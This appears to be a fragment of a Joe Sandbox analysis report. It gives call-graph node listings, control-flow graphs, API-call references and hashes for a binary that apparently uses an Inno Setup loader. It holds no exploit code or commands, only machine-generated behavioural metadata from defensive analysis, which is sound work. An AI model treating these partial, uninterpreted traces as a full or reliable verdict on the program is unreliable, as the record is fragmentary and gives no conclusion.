5053->5055 5056 409a75 5054->5056 5055->5054 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5056->5057 5058 409a7a MsgWaitForMultipleObjects 5057->5058 5058->5056 5059 409a91 5058->5059 5060 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5059->5060 5061 409a96 GetExitCodeProcess CloseHandle 5060->5061 5062 409ab6 5061->5062 5063 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5064 409abe 5063->5064 5064->5000 5065 402f24 5066 403154 4 API calls 5065->5066 5067 402f29 5066->5067 5323 402bcc 5067->5323 5069 402f51 5069->5069 5071 40990e 5070->5071 5072 4098d4 5070->5072 5071->5002 5072->5071 5073 403420 18 API calls 5072->5073 5074 409908 5073->5074 5326 408e80 5074->5326 5077 409532 5076->5077 5081 4094eb 5076->5081 5077->5004 5078 4094f3 Sleep 5078->5081 5079 409503 Sleep 5079->5081 5081->5077 5081->5078 5081->5079 5082 40951a GetLastError 5081->5082 5349 408fbc 5081->5349 5082->5077 5083 409524 GetLastError 5082->5083 5083->5077 5083->5081 5087 403591 5084->5087 5093 4035a0 5084->5093 5085 4035b1 5088 403198 4 API calls 5085->5088 5086 4035b8 5089 4031b8 4 API calls 5086->5089 5090 4035d0 5087->5090 5091 40359b 5087->5091 5092 4035b6 5087->5092 5088->5092 5089->5092 5090->5092 5095 40357c 4 API calls 5090->5095 5091->5093 5094 4035ec 5091->5094 5092->5011 5093->5085 5093->5086 5094->5092 5366 403554 5094->5366 5095->5090 5098 4025b0 5097->5098 5100 4025ba 5097->5100 5099 403154 4 API calls 5098->5099 5098->5100 5099->5100 5100->5013 5124 4051a8 5101->5124 5104 407284 FormatMessageA 5105 4072aa 5104->5105 5106 403278 18 API calls 5105->5106 5107 4072c7 5106->5107 5108 408da8 5107->5108 5109 408dc8 5108->5109 5267 408c80 5109->5267 5112 405890 5113 405897 5112->5113 5114 4031e8 18 API calls 5113->5114 5115 4058af 5114->5115 5115->5022 5118 4031be 5116->5118 5117 4031e3 5120 403198 5117->5120 5118->5117 5119 4025ac 4 API calls 5118->5119 5119->5118 5121 4031b7 5120->5121 5122 40319e 5120->5122 5121->4986 5121->5065 5122->5121 5123 4025ac 4 API calls 5122->5123 5123->5121 5125 4051c5 5124->5125 5132 404e58 5125->5132 5128 4051f1 5137 403278 5128->5137 5134 404e73 5132->5134 5133 404e85 5133->5128 5142 404be4 5133->5142 5134->5133 5145 404f7a 5134->5145 5152 404e4c 5134->5152 5138 403254 18 API calls 5137->5138 5139 403288 5138->5139 5140 403198 4 API calls 5139->5140 5141 4032a0 5140->5141 5141->5104 5259 405940 5142->5259 5144 404bf5 5144->5128 5146 404f8b 5145->5146 5150 404fd9 5145->5150 5149 40505f 5146->5149 5146->5150 5148 404ff7 5148->5134 5149->5148 5159 404e38 5149->5159 5150->5148 5155 404df4 5150->5155 5153 403198 4 API calls 5152->5153 5154 404e56 5153->5154 5154->5134 5156 404e02 5155->5156 5162 404bfc 5156->5162 5158 404e30 5158->5150 5189 4039a4 5159->5189 5165 4059b0 5162->5165 5164 404c15 5164->5158 5166 4059be 5165->5166 5175 404cdc LoadStringA 5166->5175 5169 405194 33 API calls 5170 4059f6 5169->5170 5178 4031e8 5170->5178 5173 4031b8 4 API calls 5174 405a1b 5173->5174 5174->5164 5176 403278 18 API calls 5175->5176 5177 404d09 5176->5177 5177->5169 5179 4031ec 5178->5179 5182 4031fc 5178->5182 5179->5182 5184 403254 5179->5184 5180 403228 5180->5173 5182->5180 5183 4025ac 4 API calls 5182->5183 5183->5180 5185 403274 5184->5185 5186 403258 5184->5186 5185->5182 5187 402594 18 API calls 5186->5187 5188 403261 5187->5188 5188->5182 5190 4039ab 5189->5190 5195 4038b4 5190->5195 5192 4039cb 5193 403198 4 API calls 5192->5193 5194 4039d2 5193->5194 5194->5148 5196 4038d5 5195->5196 5197 4038c8 5195->5197 5199 403934 5196->5199 5200 4038db 5196->5200 5223 403780 5197->5223 5201 403993 5199->5201 5202 40393b 5199->5202 5203 4038e1 5200->5203 5204 4038ee 5200->5204 5205 4037f4 3 API calls 5201->5205 5206 403941 5202->5206 5207 40394b 5202->5207 5230 403894 5203->5230 5210 403894 6 API calls 5204->5210 5208 4038d0 5205->5208 5245 403864 5206->5245 5212 4037f4 3 API calls 5207->5212 5208->5192 5213 4038fc 5210->5213 5215 40395d 5212->5215 5235 4037f4 5213->5235 5217 403864 23 API calls 5215->5217 5216 403917 5241 40374c 5216->5241 5218 403976 5217->5218 5220 40374c VariantClear 5218->5220 5222 40398b 5220->5222 5221 40392c 5221->5192 5222->5192 5224 4037f0 5223->5224 5229 403744 5223->5229 5224->5208 5225 403793 VariantClear 5225->5229 5226 4037ab 5226->5208 5227 4037dc VariantCopyInd 5227->5224 5227->5229 5228 403198 4 API calls 5228->5229 5229->5223 5229->5225 5229->5226 5229->5227 5229->5228 5250 4036b8 5230->5250 5233 40374c VariantClear 5234 4038a9 5233->5234 5234->5208 5236 403845 VariantChangeTypeEx 5235->5236 5237 40380a VariantChangeTypeEx 5235->5237 5240 403832 5236->5240 5238 403826 5237->5238 5239 40374c VariantClear 5238->5239 5239->5240 5240->5216 5242 403766 5241->5242 5243 403759 5241->5243 5242->5221 5243->5242 5244 403779 VariantClear 5243->5244 5244->5221 5256 40369c SysStringLen 5245->5256 5248 40374c VariantClear 5249 403882 5248->5249 5249->5208 5251 4036cb 5250->5251 5252 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5251->5252 5253 4036db 5251->5253 5254 40372e 5252->5254 5255 4036ed MultiByteToWideChar SysAllocStringLen 5253->5255 5254->5233 5255->5254 5257 403610 21 API calls 5256->5257 5258 4036b3 5257->5258 5258->5248 5260 40594c 5259->5260 5261 404cdc 19 API calls 5260->5261 5262 405972 5261->5262 5263 4031e8 18 API calls 5262->5263 5264 40597d 5263->5264 5265 403198 4 API calls 5264->5265 5266 405992 5265->5266 5266->5144 5268 403198 4 API calls 5267->5268 5270 408cb1 5267->5270 5268->5270 5269 4031b8 4 API calls 5271 408d69 5269->5271 5272 408cc8 5270->5272 5273 403278 18 API calls 5270->5273 5275 4032fc 18 API calls 5270->5275 5276 408cdc 5270->5276 5271->5112 5274 4032fc 18 API calls 5272->5274 5273->5270 5274->5276 5275->5270 5276->5269 5278 4034fd 5277->5278 5285 40352d 5277->5285 5280 403526 5278->5280 5283 403509 5278->5283 5279 403198 4 API calls 5282 403517 5279->5282 5281 403254 18 API calls 5280->5281 5281->5285 5282->5043 5286 4025c4 5283->5286 5285->5279 5287 4025ca 5286->5287 5288 4025dc 5287->5288 5290 403154 5287->5290 5288->5282 5288->5288 5291 403164 5290->5291 5292 40318c TlsGetValue 5290->5292 5291->5288 5293 403196 5292->5293 5294 40316f 5292->5294 5293->5288 5298 40310c 5294->5298 5296 403174 TlsGetValue 5297 403184 5296->5297 5297->5288 5299 403120 LocalAlloc 5298->5299 5300 403116 5298->5300 5301 40313e TlsSetValue 5299->5301 5302 403132 5299->5302 5300->5299 5301->5302 5302->5296 5304 406b1c 5303->5304 5305 403278 18 API calls 5304->5305 5306 406b29 5305->5306 5313 403420 5306->5313 5308 406b31 5309 4031e8 18 API calls 5308->5309 5310 406b49 5309->5310 5311 403198 4 API calls 5310->5311 5312 406b6b 5311->5312 5312->5046 5314 403426 5313->5314 5316 403437 5313->5316 5315 403254 18 API calls 5314->5315 5314->5316 5315->5316 5316->5308 5318 4033bc 5317->5318 5319 403254 18 API calls 5318->5319 5320 4033cf 5319->5320 5321 4031e8 18 API calls 5320->5321 5322 4033f7 5321->5322 5324 402bd5 RaiseException 5323->5324 5325 402be6 5323->5325 5324->5325 5325->5069 5327 408e8e 5326->5327 5329 408ea6 5327->5329 5339 408e18 5327->5339 5330 408e18 18 API calls 5329->5330 5331 408eca 5329->5331 5330->5331 5342 407918 5331->5342 5333 408ee5 5334 408e18 18 API calls 5333->5334 5336 408ef8 5333->5336 5334->5336 5335 408e18 18 API calls 5335->5336 5336->5335 5337 403278 18 API calls 5336->5337 5338 408f27 5336->5338 5337->5336 5338->5071 5340 405890 18 API calls 5339->5340 5341 408e29 5340->5341 5341->5329 5345 4078c4 5342->5345 5346 4078d6 5345->5346 5347 4078e7 5345->5347 5348 4078db InterlockedExchange 5346->5348 5347->5333 5348->5347 5357 408f70 5349->5357 5351 408fd6 5351->5081 5352 408fd2 5352->5351 5353 408ff2 DeleteFileA GetLastError 5352->5353 5354 409010 5353->5354 5363 408fac 5354->5363 5358 408f7a 5357->5358 5359 408f7e 5357->5359 5358->5352 5360 408fa0 SetLastError 5359->5360 5361 408f87 Wow64DisableWow64FsRedirection 5359->5361 5362 408f9b 5360->5362 5361->5362 5362->5352 5364 408fb1 Wow64RevertWow64FsRedirection 5363->5364 5365 408fbb 5363->5365 5364->5365 5365->5081 5367 403566 5366->5367 5369 403578 5367->5369 5370 403604 5367->5370 5369->5094 5371 40357c 5370->5371 5376 40359b 5371->5376 5377 4035b6 5371->5377 5378 4035d0 5371->5378 5379 4035a0 5371->5379 5372 4035b1 5374 403198 4 API calls 5372->5374 5373 4035b8 5375 4031b8 4 API calls 5373->5375 5374->5377 5375->5377 5376->5379 5380 4035ec 5376->5380 5377->5367 5378->5377 5381 40357c 4 API calls 5378->5381 5379->5372 5379->5373 5380->5377 5382 403554 4 API calls 5380->5382 5381->5378 5382->5380 6673 401ab9 6674 401a96 6673->6674 6675 401aa9 RtlDeleteCriticalSection 6674->6675 6676 401a9f RtlLeaveCriticalSection 6674->6676 6676->6675

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2441996862-0
                                                                                                                                                                                                                                          • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                                                                                                                                          • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                          • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                                                                                                                                          • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                                                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                                                                                                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,01F41E2C), ref: 0040966C
                                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                                                                                                                          • SetWindowLongA.USER32(00020408,000000FC,00409960), ref: 0040AB15
                                                                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00020408,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                                                                                                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                          • API String ID: 3757039580-3001827809
                                                                                                                                                                                                                                          • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                                                                                                                                          • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                          • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                          • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                                                                                                                                          • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                                                                                                                          • SetWindowLongA.USER32(00020408,000000FC,00409960), ref: 0040AB15
                                                                                                                                                                                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                                                                                                                                                            • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                                                                                                                            • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000), ref: 00409A70
                                                                                                                                                                                                                                            • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                                                                                                                            • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                                                                                                                            • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8), ref: 00409AA4
                                                                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00020408,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                                                                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                          • API String ID: 3586484885-3001827809
                                                                                                                                                                                                                                          • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                                                                                                                          • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8,00000000), ref: 00409A70
                                                                                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,01F41E2C,00409AD8), ref: 00409AA4
                                                                                                                                                                                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,01F41E2C), ref: 0040966C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                          • API String ID: 3356880605-2746444292
                                                                                                                                                                                                                                          • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                                                                                                                          • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 148 401983-401995 146->148 148->148 149 401997-4019a6 148->149 149->145 150->151
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
